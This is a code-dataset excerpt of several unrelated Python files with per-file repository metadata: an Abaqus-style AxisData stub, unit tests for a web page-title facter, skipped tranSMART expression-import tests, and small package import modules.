# A Boolean specifying whether or not to use the automatically computed maximum value for
# the axis. The default value is ON.
maxAutoCompute: Boolean = ON
# A Float specifying the maximum value when *maxAutoCompute* is true.
maxAutoValue: float = None
# A Float specifying the maximum value when *maxAutoCompute* is false. By default,
# *maxValue* is set to *maxAutoValue*.
maxValue: float = None
# A Float specifying the current maximum value displayed for this axis. This value is
# different from *maxAutoValue* or *maxValue* when the axis is being transformed (zoom or
# pan).
maxShownValue: float = None
# A Boolean specifying whether or not to use the automatically computed minimum value for
# the axis. The default value is ON.
minAutoCompute: Boolean = ON
# A Float specifying the minimum value when *minAutoCompute* is true.
minAutoValue: float = None
# A Float specifying the minimum value when *minAutoCompute* is false. By default,
# *minValue* is set to *minAutoValue*.
minValue: float = None
# A Float specifying the current minimum value displayed for this axis. This value is
# different from *minAutoValue* or *minValue* when the axis is being transformed (zoom or
# pan).
minShownValue: float = None
# An Int specifying the number the number of minor tick marks between major ticks.
# Possible values are 0 ≤≤ *minorTickCount* ≤≤ 20. When the *scale* is set to LOG, the
# minorTickCount is interpreted as the number of ticks per decade and limited to 0, 1, 4,
# 8, and 17. The default value is 1.
minorTickCount: int = 1
# A SymbolicConstant specifying the type of scale to use for the axis. Possible values
# are:LINEAR, specifying tickmarks and labels are linearly distributed.LOG, specifying
# tickmarks and labels are logarithmically distributed.DB, specifying tickmarks and labels
# are distributed on a decibel scale.DB2, specifying tickmarks and labels are distributed
# on a 2*decibel scale.The default value is LINEAR.
scale: SymbolicConstant = LINEAR
# A SymbolicConstant specifying the type of scale to use for the axis. Possible values
# are:AUTOCOMPUTE, specifying tickmarks and labels are automatically computed.INCREMENT,
# specifying tickmarks and labels are defined by a given increment.TOTAL_NUMBER,
# specifying tickmarks and labels are defined by the total number of ticks.The default
# value is AUTOCOMPUTE.
tickMode: SymbolicConstant = AUTOCOMPUTE
# An Int specifying the number of major tick marks on the axis when *tickMode*
# =TOTAL_NUMBER. Possible values are 0 ≤≤ *tickCount* ≤≤ 30. The default value is computed
# based on the range of the axis. When the *scale* is set to LOG, the tickCount is
# interpreted as the number of ticks per decade and acceptable values are 1, 4, 8, and 17.
tickCount: int = None
# An Int specifying the number of major ticks effectively shown. This value takes zoom,
# pan and rounding into account.
tickCountShown: int = None
# A Float specifying the increment of the major tick marks on the axis when *tickMode* =
# INCREMENT. Valid values are 0 << *tickIncrement*. The default value is computed based on
# the results of the automatic method and the range being plotted. When the *scale* is set
# to LOG, the tickIncrement is interpreted as a value per decade and should be between
# 0.05 and 1.
tickIncrement: float = None
# A Float specifying the shown tick increment of the major ticks. This value takes
# zoom/pan into account.
tickIncrementShown: float = None
# A Boolean specifying whether the title to use for the axis title is system defined or
# user defined. The default value is ON.
useSystemTitle: Boolean = ON
# An XYCurveArray object specifying a read-only sequence of Curve objects associated to
# this axis.
curves: XYCurveArray = XYCurveArray()
# A QuantityType object specifying the quantity type: i.e. the physical dimension and
# associated label of the data represented by this axis.
quantityType: QuantityType = QuantityType()
# A tuple of Floats specifying the read-only major tick values shown.
tickValues: float = None
# A tuple of Strings specifying the read-only major tick labels shown.
tickLabels: tuple = ()
# A String specifying the system title. The system title is based on the *quantityType* of
# the axis and associated curves.
systemTitle: str = ''
# A String specifying the title of the axis. By default, the title is set to the
# *systemTitle*.
title: str = ''
def setValues(self, axisData: 'AxisData' = None, labelFormat: SymbolicConstant = AUTOMATIC,
labelNumDigits: int = 2, scale: SymbolicConstant = LINEAR, dbReference: float = 1,
minAutoCompute: Boolean = ON, minValue: float = None, maxAutoCompute: Boolean = ON,
maxValue: float = None, tickMode: SymbolicConstant = AUTOCOMPUTE,
tickIncrement: float = None, tickCount: int = None, minorTickCount: int = 1,
title: str = '', useSystemTitle: Boolean = ON):
"""This method modifies the AxisData object.
Parameters
----------
axisData
An AxisData object from which attributes are to be copied.
labelFormat
A SymbolicConstant specifying how tick labels are formatted. Possible values are
AUTOMATIC, DECIMAL, SCIENTIFIC, and ENGINEERING. The default value is AUTOMATIC.
labelNumDigits
An Int specifying the number of significant digits displayed for the labels. Possible
values are 1 to 7. The default value is 2.
scale
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:LINEAR, specifying tickmarks and labels are linearly distributed.LOG, specifying
tickmarks and labels are logarithmically distributed.DB, specifying tickmarks and labels
are distributed on a decibel scale.DB2, specifying tickmarks and labels are distributed
on a 2*decibel scale.The default value is LINEAR.
dbReference
A Float specifying the reference value for decibel computation. The default value is
1.0.
minAutoCompute
A Boolean specifying whether or not to use the automatically computed minimum value for
the axis. The default value is ON.
minValue
A Float specifying the minimum value when *minAutoCompute* is false. By default,
*minValue* is set to *minAutoValue*.
maxAutoCompute
A Boolean specifying whether or not to use the automatically computed maximum value for
the axis. The default value is ON.
maxValue
A Float specifying the maximum value when *maxAutoCompute* is false. By default,
*maxValue* is set to *maxAutoValue*.
tickMode
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:AUTOCOMPUTE, specifying tickmarks and labels are automatically computed.INCREMENT,
specifying tickmarks and labels are defined by a given increment.TOTAL_NUMBER,
specifying tickmarks and labels are defined by the total number of ticks.The default
value is AUTOCOMPUTE.
tickIncrement
A Float specifying the increment of the major tick marks on the axis when *tickMode* =
INCREMENT. Valid values are 0 << *tickIncrement*. The default value is computed based on
the results of the automatic method and the range being plotted. When the *scale* is set
to LOG, the tickIncrement is interpreted as a value per decade and should be between
0.05 and 1.
tickCount
An Int specifying the number of major tick marks on the axis when *tickMode*
=TOTAL_NUMBER. Possible values are 0 ≤≤ *tickCount* ≤≤ 30. The default value is computed
based on the range of the axis. When the *scale* is set to LOG, the tickCount is
interpreted as the number of ticks per decade and acceptable values are 1, 4, 8, and 17.
minorTickCount
An Int specifying the number the number of minor tick marks between major ticks.
Possible values are 0 ≤≤ *minorTickCount* ≤≤ 20. When the *scale* is set to LOG, the
minorTickCount is interpreted as the number of ticks per decade and limited to 0, 1, 4,
8, and 17. The default value is 1.
title
A String specifying the title of the axis. By default, the title is set to the
*systemTitle*.
useSystemTitle
A Boolean specifying whether the title to use for the axis title is system defined or
user defined. The default value is ON.
Raises
------
RangeError
"""
pass
| 52.679739 | 171 | 0.692432 | 2,131 | 16,120 | 5.246363 | 0.092914 | 0.060465 | 0.044275 | 0.050179 | 0.83551 | 0.824776 | 0.799553 | 0.791413 | 0.790877 | 0.790877 | 0 | 0.00852 | 0.25732 | 16,120 | 305 | 172 | 52.852459 | 0.923321 | 0.820161 | 0 | 0 | 0 | 0 | 0.004242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.081081 | 0 | 0.837838 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
59599c6e964a4b44be12c430728e226b8762c990 | 94 | py | Python | mogu/netflow.py | vishalbelsare/MoguNumerics | 4b6b55b562c3fe318552dd48f6b630d618bbbfc2 | [
"MIT"
] | 10 | 2017-08-10T18:30:54.000Z | 2020-07-05T10:18:20.000Z | mogu/netflow.py | vishalbelsare/MoguNumerics | 4b6b55b562c3fe318552dd48f6b630d618bbbfc2 | [
"MIT"
] | 1 | 2021-06-21T22:18:22.000Z | 2021-06-21T23:17:08.000Z | mogu/netflow.py | vishalbelsare/MoguNumerics | 4b6b55b562c3fe318552dd48f6b630d618bbbfc2 | [
"MIT"
] | 5 | 2017-05-21T16:54:52.000Z | 2020-07-05T10:18:57.000Z |
# for backward compatibility
from graphflow import simvoltage
from graphflow import pagerank
| 18.8 | 32 | 0.851064 | 11 | 94 | 7.272727 | 0.727273 | 0.325 | 0.475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138298 | 94 | 4 | 33 | 23.5 | 0.987654 | 0.276596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5977a7aab6a7165b9c93cd94e3dc639c53721e34 | 7,263 | py | Python | tests/unit/facters/test_title.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | tests/unit/facters/test_title.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | tests/unit/facters/test_title.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import lxml.html
from mock import Mock
from preggy import expect
from holmes.config import Config
from holmes.reviewer import Reviewer
from holmes.facters.title import TitleFacter
from tests.unit.base import FacterTestCase
from tests.fixtures import PageFactory
class TestTitleFacter(FacterTestCase):
def test_can_get_facts(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = self.get_file('globo.html')
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
facter.add_fact.assert_called_once_with(
key='page.title',
value=u'globo.com - Absolutamente tudo sobre not\xedcias, '
'esportes e entretenimento',
)
expect(facter.review.data).to_length(2)
expect(facter.review.data).to_include('page.title_count')
expect(facter.review.data).to_include('page.title')
expect(facter.review.data['page.title_count']).to_equal(1)
def test_can_get_facts_with_non_ascii_title(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
title = u'ãéìôü' * 14
content = '<html><title>%s</title></html>' % title
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
facter.add_fact.assert_called_once_with(
key='page.title',
value=title
)
expect(facter.review.data).to_length(2)
expect(facter.review.data).to_include('page.title_count')
expect(facter.review.data).to_include('page.title')
expect(facter.review.data['page.title_count']).to_equal(1)
expect(facter.review.data['page.title']).to_length(70)
def test_can_get_facts_deburring_title(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
title = 'a' * 70
content = '<html> <title>\n %s\n </title></html>' % title
html_content = lxml.html.fromstring(content)
result = {
'url': page.url,
'status': 200,
'content': content,
'html': html_content
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
facter.add_fact.assert_called_once_with(
key='page.title',
value=html_content.cssselect('title')[0].text.strip()
)
expect(facter.review.data).to_length(2)
expect(facter.review.data).to_include('page.title_count')
expect(facter.review.data).to_include('page.title')
expect(facter.review.data['page.title_count']).to_equal(1)
expect(facter.review.data['page.title']).to_length(70)
def test_no_title_tag(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<html></html>'
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
expect(facter.add_fact.called).to_be_false()
expect(facter.review.data).to_be_like({})
def test_with_empty_title(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<html><title></title></html>'
html_content = lxml.html.fromstring(content)
result = {
'url': page.url,
'status': 200,
'content': content,
'html': html_content
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
expect(facter.add_fact.called).to_be_false()
expect(facter.review.data).to_be_like({})
def test_can_get_fact_definitions(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = self.get_file('globo.html')
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
response = Mock(status_code=200, text=content, headers={})
reviewer.content_loaded(page.url, response)
facter = TitleFacter(reviewer)
definitions = facter.get_fact_definitions()
expect(definitions).to_length(1)
expect('page.title' in definitions).to_be_true()
| 30.012397 | 90 | 0.578962 | 806 | 7,263 | 5.024814 | 0.135236 | 0.051852 | 0.071111 | 0.086914 | 0.835309 | 0.815556 | 0.815556 | 0.806914 | 0.806914 | 0.806914 | 0 | 0.017434 | 0.297122 | 7,263 | 241 | 91 | 30.136929 | 0.775906 | 0.005232 | 0 | 0.763158 | 0 | 0 | 0.090129 | 0.00803 | 0 | 0 | 0 | 0 | 0.015789 | 1 | 0.031579 | false | 0 | 0.042105 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
597e961232bc885b98a4326cd910d8e6db00aa76 | 11,685 | py | Python | resolwe_bio/tests/processes/test_transmart.py | JenkoB/resolwe-bio | a958cf3fc82ebc37f527e1b156753f2324a33803 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/tests/processes/test_transmart.py | JenkoB/resolwe-bio | a958cf3fc82ebc37f527e1b156753f2324a33803 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/tests/processes/test_transmart.py | JenkoB/resolwe-bio | a958cf3fc82ebc37f527e1b156753f2324a33803 | [
"Apache-2.0"
] | 1 | 2021-09-03T08:50:54.000Z | 2021-09-03T08:50:54.000Z | # pylint: disable=missing-docstring
import unittest
from resolwe_bio.utils.test import ProcessTestCase
class TranSMARTProcessorTestCase(ProcessTestCase):
@unittest.skip("processor connects to remote tranSMART server")
def test_import(self):
# self.assertDataCount(0)
inputs = {'exps': 'transmart_log_exp.xlsx'}
annotation = self.run_process('transmart-expressions', inputs)
# self.assertDataCount(5)
self.assertFields(annotation, 'expset_type', 'Log2')
self.assertFileExists(annotation, 'expset')
@unittest.skip("processor connects to remote tranSMART server")
def test_import_with_annotation(self):
self.keep_all()
ann = ('/studies/UBIOPRED/concepts/Sample%20Identifiers/Virology%20Sample%20ID/18_or_more;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Virology%20Sample%20ID/2to17;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Virology%20Sample%20ID/less_than_2;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Baseline%20visit%20kitID/no;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Baseline%20visit%20kitID/yes;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Bronchoscopy%20visit%20kitID%201/yes;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Longitudinal%20visit%20kitID;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Active/18_or_more;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Active/2to17;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Active/unknown;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis%20Active/'
'18_or_more;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis%20Active/'
'less_than_2;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Active/18_or_more;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Active/2to17;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Active/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Active/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Age%20Of%20Onset/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Age%20Of%20Onset/uncertain;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Age%20Of%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/more_than_twice_a_week;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/once_a_day;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/once_a_month;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/weekly;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Congestive'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Active/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Age%20Of'
'%20Onset/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Age%20Of'
'%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Diagnosed/'
'no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Diabetes%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Diabetes%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Diabetes%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/Done'
'%20at%20screening%20visit;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/DONE'
'%20ON%20SAME%20DAY%20AS%20SCREENING;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/SAME'
'%20DAY%20AS%20SCREENING;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/SAME'
'%20DAY%20AS%20SCREENING%20VISIT;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/'
'SCREENING%20AND%20BASELINE%201%20VISIT%20IN%20THE%20SAME%20DAY;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/'
'THIS%20VISIT%20ON%20SAME%20DAY%20AS%20SCREENING; /studies/UBIOPRED/concepts/Subject%20History/'
'Medical%20or%20Surgical%20History/Eczema%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Eczema%20Age%20Of'
'%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Eczema%20Diagnosed/'
'null;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Gerd%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Gerd%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Gerd%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hay%20Fever%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hay%20Fever%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hay%20Fever'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Diagnosed/High;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Diagnosed/med%20to%20low; /studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical'
'%20History/Hypertension%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hypertension%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hypertension'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis%20Age%20Of'
'%20Onset/MOMETASONE%2050MCG; /studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical'
'%20History/Nasal%20Polyps%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyps%20Age%20'
'Of%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyps'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Age%20Of%20Onset/PLUMBING%20AND%20HEATING%20ENGINEER%20QUALIFICATIONS;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Active/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Age%20Of'
'%20Onset/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Age%20Of'
'%20Onset/uncertain;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Age%20Of'
'%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Diagnosed/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Diagnosed/uncertain;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Diagnosed/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Vocal%20Chord'
'%20Diagnosed/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Vocal%20Chord'
'%20Diagnosed/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Non%20Allergic'
'%20Rhinitis%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Non%20Allergic'
'%20Rhinitis%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Age%20Of%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery%20Age'
'%20Of%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Parental%20Hay%20Fever/abnormal_non_clinically_'
'significant;'
'/studies/UBIOPRED/concepts/Subject%20History/Parental%20Hay%20Fever/normal')
inputs = {
'exps': '/studies/UBIOPRED/concepts/Expression/Affymetrix'
'%20Human%20Genome%20U133%20Plus%202.0%20Array/Lung',
'ann': ann,
'token': '7b8b0ce3-a2d3-47ca-bc04-2cf4672f44ac'
}
annotation = self.run_process('transmart-expressions', inputs)
self.assertFields(annotation, 'expset_type', 'Log2')
self.assertFileExists(annotation, 'expset')
| 73.03125 | 119 | 0.680188 | 1,088 | 11,685 | 7.272978 | 0.144301 | 0.142171 | 0.217996 | 0.254012 | 0.908126 | 0.908126 | 0.893466 | 0.893466 | 0.823708 | 0.814988 | 0 | 0.105842 | 0.198716 | 11,685 | 159 | 120 | 73.490566 | 0.739293 | 0.006932 | 0 | 0.470199 | 0 | 0.417219 | 0.7375 | 0.682759 | 0 | 0 | 0 | 0 | 0.02649 | 1 | 0.013245 | false | 0 | 0.02649 | 0 | 0.046358 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
5986b92379f9c76cb26771b4649102f96388cbcb | 132 | py | Python | gquant/dataframe_flow/__init__.py | raydouglass/gQuant | f117268c3480a820ac8a93d90980192cec014883 | [
"Apache-2.0"
] | null | null | null | gquant/dataframe_flow/__init__.py | raydouglass/gQuant | f117268c3480a820ac8a93d90980192cec014883 | [
"Apache-2.0"
] | null | null | null | gquant/dataframe_flow/__init__.py | raydouglass/gQuant | f117268c3480a820ac8a93d90980192cec014883 | [
"Apache-2.0"
] | null | null | null | from .node import * # noqa: F401,F403
from .taskSpecSchema import * # noqa: F401,F403
from .taskGraph import * # noqa: F401,F403
| 33 | 48 | 0.704545 | 18 | 132 | 5.166667 | 0.444444 | 0.322581 | 0.451613 | 0.580645 | 0.473118 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0.181818 | 132 | 3 | 49 | 44 | 0.694444 | 0.356061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
abaf6857edbedb6177e6324f37c0c51d4c47c36c | 110 | py | Python | msr/data/datasets/__init__.py | real-tesco/Multi-Step-Reasoning | 12c57714c490c5ef5aea9ecabce2143ca89d90b2 | [
"Apache-2.0"
] | null | null | null | msr/data/datasets/__init__.py | real-tesco/Multi-Step-Reasoning | 12c57714c490c5ef5aea9ecabce2143ca89d90b2 | [
"Apache-2.0"
] | null | null | null | msr/data/datasets/__init__.py | real-tesco/Multi-Step-Reasoning | 12c57714c490c5ef5aea9ecabce2143ca89d90b2 | [
"Apache-2.0"
] | null | null | null | from msr.data.datasets.bertdataset import BertDataset
from msr.data.datasets.indexdataset import IndexDataset
| 36.666667 | 55 | 0.872727 | 14 | 110 | 6.857143 | 0.5 | 0.145833 | 0.229167 | 0.395833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072727 | 110 | 2 | 56 | 55 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
abec301c11ff9fc8003fee9c7eb0c9b923d1c05d | 15,078 | py | Python | contact_form.py | chucktilbury/Accounting-TK | d0206f07d44e27eb08ecc5c59442604e0bddc3a3 | [
"MIT"
] | null | null | null | contact_form.py | chucktilbury/Accounting-TK | d0206f07d44e27eb08ecc5c59442604e0bddc3a3 | [
"MIT"
